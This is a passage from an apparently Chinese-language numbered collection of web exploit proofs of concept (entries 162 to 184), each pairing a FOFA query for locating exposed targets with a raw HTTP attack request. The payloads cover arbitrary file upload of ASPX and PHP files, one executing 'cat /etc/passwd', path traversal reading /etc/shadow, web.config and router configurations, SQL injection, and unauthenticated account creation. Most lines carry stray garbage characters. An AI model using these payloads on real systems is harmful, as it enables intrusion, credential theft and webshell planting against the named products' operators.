. h: v& ~; {; m, p9 j+ W9 MAccept-Encoding: gzip- J6 [# m) q% P8 F" m, u5 M
5 r7 m6 k/ }5 ^; ~* N8 d+ u) o3 T1 ]4 }
<?xml version="1.0" encoding="utf-8"?>
9 U. A8 W- ?7 H- Q5 l0 \( G: ^<soap:Envelope xmlns:xsi="
# B8 D# v% m1 z/ c7 o# Z* xhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
8 ]0 d5 H% D5 z; p3 q- p# Txmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+ F j% ?; Q4 I' l5 P, \: f1 U<soap:Body>
: D% Y& o) P- k# M' G$ p* p<UploadResume xmlns="http://tempuri.org/">
* Z8 N8 W7 |& Q3 n<ip>1</ip>8 N& H6 i* R% I) R
<fileName>../../../../dizxdell.aspx</fileName>0 Q; ]0 \7 b# t" j( @' M9 w: u
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>" i6 \/ N/ ^& d1 ?. w& y( j
<tag>3</tag> E1 O3 U; b/ g5 I% v
</UploadResume>
; }. M9 l; D. W+ A6 X</soap:Body>
6 U: n4 g& Y }3 l</soap:Envelope>
4 ~! H# M' z6 E' V* { \) i4 D% Y8 |9 G$ H4 e% d5 M
6 i3 l7 r$ A( e5 Q. p, F5 Ohttp://x.x.x.x/dizxdell.aspx
! @1 @- r8 i. a, K2 M/ H2 a: S7 N
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传* f; }2 E3 ^( G
FOFA: app="和丰山海-数字标牌"- \0 D1 l$ m6 g8 B) R
POST /QH.aspx HTTP/1.1% M: m& T% X' {, X$ u4 b: n
Host: x.x.x.x- Q$ G8 g$ }' Q4 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
4 W/ a- b" g% F; N/ fConnection: close1 T+ h" y, W* ?6 M8 c
Content-Length: 583; ^& i2 ~ L& L5 a. d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
& M' _& ~9 f* `& l. o+ ]+ L/ v8 YAccept-Encoding: gzip
' T2 d" y% `! u+ \9 g9 l
0 y6 Z3 }: q/ @ S& i- W' o------WebKitFormBoundaryeegvclmyurlotuey1 L7 \8 N8 D" S1 ]8 u
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"/ [ D2 M# F0 A( H: ~2 X3 r" K8 T
Content-Type: application/octet-stream
- S4 S, f2 ~, e$ \2 r% m8 M! q# {9 t$ q
<% response.write("ujidwqfuuqjalgkvrpqy") %>
" y2 @" m6 ~" G7 @$ R7 I------WebKitFormBoundaryeegvclmyurlotuey
6 s) ^0 w9 ^* q; P8 JContent-Disposition: form-data; name="action"9 r5 Z$ n6 ^9 Q9 U7 M
6 O% y9 M2 D: k3 [, `$ l+ Yupload5 G6 O' I$ S c/ T# Z7 a
------WebKitFormBoundaryeegvclmyurlotuey5 N6 z+ L( J. g- v
Content-Disposition: form-data; name="responderId"
; A7 ^5 J$ T# Z
2 M+ Y+ j0 D) ~5 M- R" q7 QResourceNewResponder; y: {4 o( Q" X3 }: K
------WebKitFormBoundaryeegvclmyurlotuey
: W: X% ?" B0 c" f: yContent-Disposition: form-data; name="remotePath"
- _. ]" _+ S! M, u# }, i: J7 d* I* f/ l7 U# d
/opt/resources7 Z+ [1 ?, x# l6 W
------WebKitFormBoundaryeegvclmyurlotuey--. f; {; ^) N5 Y. u" x) j) r( g+ G
' E( [$ `7 l# N4 ]
& g% L* ] f; B6 G" M' D4 [5 thttp://x.x.x.x/opt/resources/kjuhitjgk.aspx/ e4 Y" u9 r( q: u$ ?
/ R" ?" E; T2 l) y, v: z- ?2 ~
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传/ N9 U: m8 G" Q6 h
FOFA: icon_hash="-795291075"
$ i3 \7 }: J% R5 `2 K" m- iPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.11 T- I1 r4 `2 X& f% u& c
Host: x.x.x.x
- M4 L; M) I- f) C6 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36. r" p: z8 n' ]
Connection: close
/ w1 @, f' `2 n' Q5 t* F( JContent-Length: 293
& k: o* K+ [: p, mAccept: */*
- G# ]- {# k0 u: }2 sAccept-Encoding: gzip, deflate
7 c8 A# [- K. R& U3 x& sAccept-Language: zh-CN,zh;q=0.9
6 X: M0 g1 k; g8 x2 tContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
/ ~- s o7 v* y C3 A% c0 Y) q
0 \( i7 _/ O7 p+ H7 q8 r------iiqvnofupvhdyrcoqyuujyetjvqgocod) L9 D* o) ^7 s; {. q4 I- P* u/ b B3 r
Content-Disposition: form-data; name="name"
! u" n7 }6 A" m9 x/ u. C
^1 X4 a4 H/ _+ g7 o1.php
8 Y1 n6 n9 ]6 f------iiqvnofupvhdyrcoqyuujyetjvqgocod
3 X0 j( L4 Q4 q: QContent-Disposition: form-data; name="upfile"; filename="1.php"
- ? Z/ N6 s1 LContent-Type: image/jpeg5 C& x5 u( q V0 n0 x/ V! y+ y" z& i
3 E6 K8 x1 H8 Y- T. C7 a( Jrvjhvbhwwuooyiioxega
: {0 d7 B, p5 m% F9 F1 B7 }------iiqvnofupvhdyrcoqyuujyetjvqgocod--0 M, {8 y- T7 W7 g5 Q. M( F
, r0 g* S7 H: k% p' D4 d
$ D7 d6 Y1 k% f& K% P3 [# n164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传7 G$ _; g8 V: u2 U
FOFA: title="智慧综合管理平台登入"8 s7 N1 I' V6 h* T7 @3 o: U; [1 j$ q1 d
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1# ^0 x+ ^6 t% c) a/ H1 N8 T! j
Host: x.x.x.x
# P' o( V/ B3 ]* x" Q9 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
7 u! Z; s4 S- I1 KContent-Length: 2881 v* A9 m/ T8 q- j3 I. }" B. H
Accept: application/json, text/javascript, */*; q=0.01* \: _. Y' m* e) ]- o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,' ^; T& \+ G9 h$ W4 m) ?7 P
Connection: close
2 Z* _) ^; @3 W D1 ?1 V' ~Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
: L' r. s( e% E, {" n5 j( SX-Requested-With: XMLHttpRequest
) ~! a- U; q* g# yAccept-Encoding: gzip
4 Y5 ^( ]8 e; m5 }6 u7 x% e6 N, E0 Q# u& x# G
------dqdaieopnozbkapjacdbdthlvtlyl8 b/ [9 k8 R2 A0 {1 u
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
6 t& R" }" t( G5 A6 cContent-Type: image/jpeg
; K0 m7 c: \1 s" o
) L/ ~& S) o: ?% }$ x, P9 ^<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
: z% L& Y/ x t; L: E------dqdaieopnozbkapjacdbdthlvtlyl--1 H' E' M! A1 Y
& V9 z! }7 R$ C/ j: S/ o+ ? D
# L/ w) l- ?$ U5 o; E) Vhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx' j' s. Y& G) n" S% ]4 t
% m% Z" I4 S6 c# L9 S/ f0 Q
165. OrangeHRM 3.3.3 SQL 注入8 U+ w% A8 p7 q! L, o* T
CVE-2024-36428) F8 \$ K, ]; N& u E M
FOFA: app="OrangeHRM-产品"* Z+ j3 e) q' E
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
. p5 S4 R1 g4 _/ @& ~
, a% E6 S+ ~6 n$ U' K1 B) t$ U7 W& S1 ^1 ~
166. 中成科信票务管理平台SeatMapHandler SQL注入
( z0 z1 x+ \/ x$ X- [) _FOFA:body="技术支持:北京中成科信科技发展有限公司"' U s% q' L! g7 {4 Z$ m& r1 Z/ i
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
- H' O' P6 t' P/ VHost:( C/ S$ g7 {& e3 v0 |$ A9 T
Pragma: no-cache% X5 H/ e9 P& s1 v
Cache-Control: no-cache. F8 v0 ?- Q- h' o" P: W
Upgrade-Insecure-Requests: 1, ^9 y+ d! g! w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36. R# _) y! h. Y; o7 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, }) |/ v; S- u2 f
Accept-Encoding: gzip, deflate" ~$ a& ]' {0 R7 N' _& z' o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 O7 y W; g) \: M% fCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE- Z7 ]1 e1 V* {+ h1 q* o* u5 e. Z
Connection: close8 V2 [" Z; o- f% }2 K3 J
Content-Type: application/x-www-form-urlencoded5 h' }; C2 I- M4 w: |, b- S. @
Content-Length: 89
. i; w* a1 p( V1 ], a( d
5 B R2 X8 X* H: r0 s I# C8 UMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
( Z7 d: J; }, T" u# B
9 v9 [4 \; j( }. @
, u) l: y6 F3 f3 {167. 精益价值管理系统 DownLoad.aspx任意文件读取
/ k/ N l; g: m, ?: ^+ RFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx", b& R9 n u7 b/ b* H
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
! Q, k7 `. N* Z' q8 ]( B$ X5 n( E. kHost:) c0 K" Q7 h2 h. C3 O8 F% R! X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! d4 C! q/ P$ U4 t2 o5 }Content-Type: application/x-www-form-urlencoded& s7 \! ?6 l0 Z9 @/ {( v
Accept-Encoding: gzip, deflate
! [% r# Z( p% m* j7 }+ ]: u# mAccept: */*
6 f9 L7 d5 V7 ?Connection: keep-alive
/ o& M& D6 g( ]; W, y' O! U5 K
% |1 Q* ~& B, z- ~' V% g5 x9 X2 P& B3 ?1 w; b1 m
168. 宏景EHR OutputCode 任意文件读取% @$ M [, F+ w& q) v3 e" c: t$ e
FOFA:app="HJSOFT-HCM"" f4 _ j' V5 R4 ~4 b+ n) M, [+ ~* _
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
" M6 D; F% P) ?4 b' B5 E9 k2 \Host: your-ip0 A d, ?; p4 s$ X; J( j0 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36# F- P U; p% c6 s
Content-Type: application/x-www-form-urlencoded
! A! C0 m0 O, t, t8 a4 V6 TConnection: close! I% F& I X3 Y, ?# h" A# \" u
L# C) ?. y8 o* j6 D2 i8 T# e
( _7 ^* _. B( F. u. k! |
$ [& v' q" V T" [# w169. 宏景EHR downlawbase SQL注入
8 e( j+ t9 s) q0 t: |7 NFOFA:app="HJSOFT-HCM"
( w( [2 T) y6 l FGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.12 m6 k+ }9 h' i- z( l
Host: your-ip
" F" K% t+ J' k% p: H% jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ I' a8 `! d! ?" ~4 z. W
Accept: */*
4 `; b$ |# {' b* c2 {% u! E8 wAccept-Encoding: gzip, deflate, A. }0 h: S# J/ M2 y7 l: q% _
Connection: close1 t P( ~1 |' P7 X# }
" p# m5 X J6 [6 o& Y
8 g' G! U' S; C% n1 t6 B9 q6 U
6 h2 J, U$ i6 w% I2 m170. 宏景EHR DisplayExcelCustomReport 任意文件读取' E4 a3 w+ z; x* p X" C$ G
FOFA:body="/general/sys/hjaxmanage.js"
/ I* |& D" ?0 C. v7 y% k# o6 k7 RPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
) |' b9 }5 K' s m: u& THost: balalanengliang
8 D1 A1 p. K# S; |4 A8 mUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 Y1 s3 @7 {' a+ K# X. _Content-Type: application/x-www-form-urlencoded2 n9 B8 o5 E I. \. s D
9 N$ ]- X9 t) Y4 j8 }/ Gfilename=../webapps/ROOT/WEB-INF/web.xml" O! ~+ a2 q- |2 v( P) g7 I
5 q7 Y; f8 x5 ` P0 Q: v
5 @/ }' s- N; N9 n0 n/ V171. 通天星CMSV6车载定位监控平台 SQL注入; v) M! p) N9 ?* B% N
FOFA:body="/808gps/"
, k" v/ Z! j# `GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
2 y9 [ k3 h' g! Y9 ^* i: GHost: your-ip' j4 N4 @7 l4 g* g8 e+ j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
5 B2 s. g9 g/ r4 P, C y1 y: c" q( O" rAccept: */*
6 j" r0 {. j3 S# }1 L, m1 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 ?; E1 z8 f, f+ X3 YAccept-Encoding: gzip, deflate; H; v( `; P5 a( O; x2 t- l e
Connection: close: S7 n: T l; R5 F$ w
2 t9 A L( L9 ]$ P& j
" M: \: L4 j2 G$ [% g' A# ^
2 j& {2 m' y# q- x2 n: d# `/ ?5 f172. DT-高清车牌识别摄像机任意文件读取
3 b# W" @8 w3 r+ YFOFA:app="DT-高清车牌识别摄像机"/ Z. W/ R! G0 W; V0 }
GET /../../../../etc/passwd HTTP/1.1+ }1 j* H( ^& Z- E4 G! h! l
Host: your-ip
; X# Q9 `; A8 _ w. {; hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 N/ A. Y5 Z* R2 Y0 K- `Accept-Encoding: gzip, deflate
2 @) I1 K) l. @( [Accept: */*0 l- r. z \6 V y" ~
Connection: keep-alive3 X q" \' R- \. y
6 w9 v3 s5 X" D/ A1 ]# a% X; r9 n% V# |8 ~6 g0 [5 Y
% p; n0 O1 f, V& y# j0 [5 S) M173. Check Point 安全网关任意文件读取$ S7 J, U u- M1 _# [' m
CVE-2024-24919
8 r; P) V: g+ `FOFA:app="Check_Point-SSL-Network-Extender"( Y" p8 I4 z; o4 d
POST /clients/MyCRL HTTP/1.1+ V) @' W4 {3 [: K
Host: your-ip3 m8 r& C4 y3 `: A- \
Content-Type: application/x-www-form-urlencoded# i, k8 ?. ^0 g& z
N' @( w0 G9 T- `
aCSHELL/../../../../../../../etc/shadow! |2 }' B$ Z) v2 E
3 F$ U3 W7 F5 n
2 d% ~0 t0 d) M! q& f+ K
7 @4 d: D3 d. h
174. 金和OA C6 FileDownLoad.aspx 任意文件读取, i* _6 u$ ?: y; u
FOFA:app="金和网络-金和OA"+ m! y; i, _: e5 v
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
% A v5 g! i$ ]Host: your-ip
. H3 Z- h A8 B$ E; V' EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! G- n6 ?1 H+ I( X4 W9 y0 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, E' [3 J z0 o1 pAccept-Encoding: gzip, deflate, br
# c6 L/ I' a4 g3 T! N/ tAccept-Language: zh-CN,zh;q=0.9
; m* S, p+ L& U3 H( ?2 s$ ^Connection: close& [" |# l" i. I
: L) B! v; ~& h0 H& F' Y; `
, M* I& c, C" N) t8 H7 L2 C: @
% L; s3 L0 j9 M
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
* v0 A5 \) u& U, ]7 DFOFA:app="金和网络-金和OA"5 Z; ~* `* E/ F% s' d0 P, M& p
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
( M4 d8 O4 _: L+ {Host:
9 _" F: t4 ?9 `7 [, I( g5 E# qUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; _4 M/ `8 I) `8 A rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) ^; i2 h5 r" g& s% q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& J7 A; F0 s) g+ C$ p8 X% \, E4 nAccept-Encoding: gzip, deflate
. R. |: F7 g, b6 A0 c- rConnection: close
; @% W# C2 l/ C L* ~9 n; cUpgrade-Insecure-Requests: 1 B) o; \. ?% \
~7 ]! q3 v' N6 ]! y, G2 K6 {
! O5 Z8 w. R3 i$ G/ A' F" L
176. 电信网关配置管理系统 rewrite.php 文件上传$ S) c) [( o) R2 h9 Y
FOFA:body="img/login_bg3.png" && body="系统登录"- c8 }) }8 S4 T3 f
POST /manager/teletext/material/rewrite.php HTTP/1.1
( L% z3 }" l+ q y2 ` sHost: your-ip3 v! P% m% _- K ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0# P, ~! O" v t! _( D7 ]7 _$ `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
2 a- r. y1 i; Y; I) F* R6 }Connection: close
2 q9 ^2 \( K! E* { F
. _( R" j8 n' A+ @# |7 U------WebKitFormBoundaryOKldnDPT
! p7 I% \# M" b9 D6 SContent-Disposition: form-data; name="tmp_name"; filename="test.php"
* ~: B' a, t/ g: e; l$ `+ u! Q# s+ b OContent-Type: image/png
7 K Z/ y6 f- m/ q F9 M3 Y
# z0 S" y; M8 Q8 R' \! H* w<?php system("cat /etc/passwd");unlink(__FILE__);?>5 T4 q# K/ [$ D, L' P' h/ J
------WebKitFormBoundaryOKldnDPT2 ]% F" y' m5 f3 C
Content-Disposition: form-data; name="uploadtime"1 r3 ~2 m0 _& D4 q
! e0 p* N+ g7 t9 W
% n! l/ j4 e" m2 S------WebKitFormBoundaryOKldnDPT--
9 U8 F" {. M, D
" S3 N* w- }6 r4 A. Q
4 ~0 a" H) Z7 I- t& k& {- Y
. Q# ]0 a! v7 t9 ^177. H3C路由器敏感信息泄露! W- i C+ d7 ?5 K2 G6 @- y) V$ L
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg' C e+ X4 H* z+ N0 L c" |' ]# @" D
/userLogin.asp/../actionpolicy_status/../M60.cfg
+ s, u3 Q" `' R' [/userLogin.asp/../actionpolicy_status/../GR8300.cfg
5 |# P, a4 W, @2 S# N3 A/ s" ]8 n7 Z/userLogin.asp/../actionpolicy_status/../GR5200.cfg4 I; ?7 W2 @% F1 V* N
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
5 x* p% M* q+ b* w/userLogin.asp/../actionpolicy_status/../GR2200.cfg& M/ F7 P. A, z. a p2 O
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
- I0 N0 ?! d2 ^' t, V/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg t' U2 d+ [6 j9 {$ e
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
$ m' n1 i" Q7 |$ g/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
1 I% Z' K9 [5 a! C. W( k* s/userLogin.asp/../actionpolicy_status/../ER5200.cfg" Q6 J6 {0 d N& O5 a2 {3 u
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
8 G7 E2 L! \& v/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
8 t3 V7 s4 Z6 l4 h$ ?+ P/userLogin.asp/../actionpolicy_status/../ER3260.cfg* C# j7 N7 o: _! X
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg R4 F# h4 q) j9 I1 W
/userLogin.asp/../actionpolicy_status/../ER3200.cfg2 h M9 U# C8 a" {
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
8 Z5 v J$ p0 M; k/userLogin.asp/../actionpolicy_status/../ER3108G.cfg; _( p' J4 Y6 Z+ h7 `, E
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
( \) c. f' z0 o! d( Z& ^7 a1 C5 h- E& [/userLogin.asp/../actionpolicy_status/../ER3100.cfg, w: P7 v/ ?4 s+ ]8 J) e/ c
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
M5 B* v8 m1 F2 `" \8 O& S! f4 x6 Z& O, H- Y S7 P
5 J2 w% _& _7 h) B178. H3C校园网自助服务系统-flexfileupload-任意文件上传
; @3 f; I0 ]7 B; SFOFA:header="/selfservice"- l% A# b. K7 h- I% Z: C( R0 [" I
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1$ ~# C0 `+ {6 K' I9 j
Host:( }$ B2 i% U0 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
: N8 O; N& Q H; k, y! V! \6 ZContent-Length: 252* g W* `# _# `- r, N7 _. f$ l' l/ u
Accept-Encoding: gzip, deflate
8 j/ ?" U9 A, H# xConnection: close
3 p# R( A5 `8 h- zContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
" f# ]% |( I! s p+ l-----------------aqutkea7vvanpqy3rh2l" h: ^8 g$ C2 V( [2 B; {/ z. `
Content-Disposition: form-data; name="12234.txt"; filename="12234"# R% M. T1 W$ f
Content-Type: application/octet-stream
) X% v* X. f! L' B4 FContent-Length: 255
$ p" |3 W9 q5 S& ~2 R0 C6 S ^; ~2 e
" M- v7 p: O: h2 O v4 D: z7 H12234( Q) X$ z6 N5 S& a
-----------------aqutkea7vvanpqy3rh2l--5 D. ^+ y" n8 s% H2 F
0 x1 O- p7 r& d3 S& y3 } T
1 k6 p9 P9 K6 B# S
GET /imc/primepush/%2e%2e/flex/12234.txt* @: V& i9 G2 p p9 H* X3 ], e
$ L/ z5 Q- M- N6 Q5 R
# O" v" s- h8 e, T2 k: b7 R179. 建文工程管理系统存在任意文件读取
. Q! K' Z* `0 G6 \POST /Common/DownLoad2.aspx HTTP/1.18 ^/ E: b; h( A- q4 T8 r
Host: {{Hostname}}
, v4 D. s2 T$ x- C' w6 C0 uContent-Type: application/x-www-form-urlencoded5 m' K& j2 o1 \% x
User-Agent: Mozilla/5.0 G: I1 N. B( Z0 S- F6 c
7 C' m" S1 n; a) n: K
path=../log4net.config&Name=9 m; V7 d, Q7 G& {" X8 C# _ E, M+ c8 O
& h& u4 @; Q3 B) O" }. L* Z; J
1 J6 A) m' ]( `( H' b* d180. 帮管客 CRM jiliyu SQL注入 ]# L9 I% Q/ q- l( Y$ y5 b
FOFA:app="帮管客-CRM"% G/ N. ?* U) L3 y
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
( g+ c9 A/ A3 y8 x3 X/ \; OHost: your-ip" }$ E2 w2 u* T7 C' D/ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: N- K& M" z- P' N. v6 Q8 G# {5 b; Y% [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# e" ^5 `% ?: P: C6 H/ gAccept-Encoding: gzip, deflate
- V+ l) I" e7 K. x \9 G4 EAccept-Language: zh-CN,zh;q=0.9
0 T( W+ {6 Y/ f3 y* eConnection: close
7 O8 Y f6 m* x4 M3 E% y4 j: i% a" v% L' l! ]
- d3 T2 C2 |- \7 Y5 S1 |
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
2 ^2 L) ^! o. {! f. b# ]% h: oFOFA:"PDCA/js/_publicCom.js"
3 i# d+ z) N& |; Q) HPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
# C" @1 ?. [, gHost: your-ip& X, q7 N! J; q$ q* ]3 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
$ x* \% A/ a2 J9 ^; vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. h' e5 g/ R" y. J7 MAccept-Encoding: gzip, deflate, br
5 f) S* A- Q/ u; X+ u5 u$ ^) dAccept-Language: zh-CN,zh;q=0.9
f f8 H! h5 x/ D- V2 \Connection: close3 U0 n* e: r2 ^7 R8 y9 ?5 G
Content-Type: application/x-www-form-urlencoded
2 k7 m {0 h; _) |! W3 E: k+ p6 ~
) x, q: r5 \3 ~3 }action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20* g! {3 I$ ~$ f5 {9 }, g/ ]4 I
# O5 j& f0 R* @* Y* {( z
4 w0 G4 S3 c {8 g: W, Y9 J1 n182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建4 [3 R% T6 g5 R- F
FOFA:"PDCA/js/_publicCom.js"
* ^. {# `; i& d6 s* |) x1 DPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
/ t! W$ J5 y* y- y. iHost: your-ip
8 Q9 j* i# {: O+ ]7 [1 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.361 {% o A) @ o9 B( i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 N/ b' [; k6 t9 F \Accept-Encoding: gzip, deflate, br
) o' b1 G1 t/ |) ]8 I BAccept-Language: zh-CN,zh;q=0.9# B" D( }, W$ Y" V6 s3 p
Connection: close0 [/ K' ?) l0 J0 E
Content-Type: application/x-www-form-urlencoded% Q! Y4 |" j) m2 y" A' A
* U( Z: p+ x, {( w8 o: Z: p. ^5 p! H T/ x$ B
username=test1234&pwd=test1234&savedays=1 v& F3 ] @* K% _
A3 b+ a9 o& f. P: X
6 O. v7 S2 d9 r6 @: x9 F7 {% E183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入2 w: y/ i$ W+ [/ u
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"- d( Z( ~( o9 c& S9 E% O
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
, m) d" d1 U) b/ p! R$ qHost: your-ip+ ^- \, u: g3 C0 r' U
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36- z9 L4 h& P7 f, E7 g L
Accept-Charset: utf-8' K& D5 ~& S" T* j, N
Accept-Encoding: gzip, deflate. G8 S: k# G% B* i( d
Connection: close N# Q" m( l9 Y& }( a
3 P4 ]7 M5 C. x* `% {5 `1 i" x* z: h( t7 |! o5 }3 f0 u. g
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加. l( V" U' b+ }9 h
FOFA:server="SunFull-Webs"3 C9 }* @2 b5 u4 G" ?
POST /soap/AddUser HTTP/1.1
1 o# T |7 h' n+ {' I; J6 P+ p/ e% i6 @Host: your-ip& K, l6 N! g( j- h6 d( j7 C
Accept-Encoding: gzip, deflate6 b- |# {/ ]/ w) ]# A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
/ F Q* m, \9 f: I9 c: t7 o& wAccept: application/xml, text/xml, */*; q=0.017 O5 P2 ^' ~ ? ^5 w* |9 d. p
Content-Type: text/xml; charset=utf-8
